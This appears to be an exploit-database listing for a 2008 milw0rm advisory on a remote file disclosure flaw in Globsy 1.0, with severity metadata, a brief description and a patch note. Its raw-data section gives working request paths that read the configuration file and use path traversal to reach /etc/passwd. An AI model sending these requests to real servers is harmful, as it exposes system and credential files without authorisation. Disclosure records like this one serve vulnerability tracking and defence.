header-logo
Suggest Exploit
vendor:
Globsy
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: Globsy
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE: N/A
CPE: a:globsy:globsy:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Globsy 1.0 (file) Remote File Disclosure Vulnerability

Globsy 1.0 is vulnerable to a remote file disclosure vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. The request should contain the file parameter with a value of 'globsy_config.php' or '../../../../../../../etc/passwd'. If the request is successful, the server will respond with the contents of the requested file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Globsy.
Source

Exploit-DB raw data:

Globsy 1.0 (file) Remote File Disclosure Vulnerability
http://switch.dl.sourceforge.net/sourceforge/globsy/globsy_1.0.tar.gz
/globsy_edit.php?file=globsy_config.php
/globsy_edit.php?file=../../../../../../../etc/passwd

# milw0rm.com [2008-02-20]

Navigation

Suggest Exploit

Services By CQR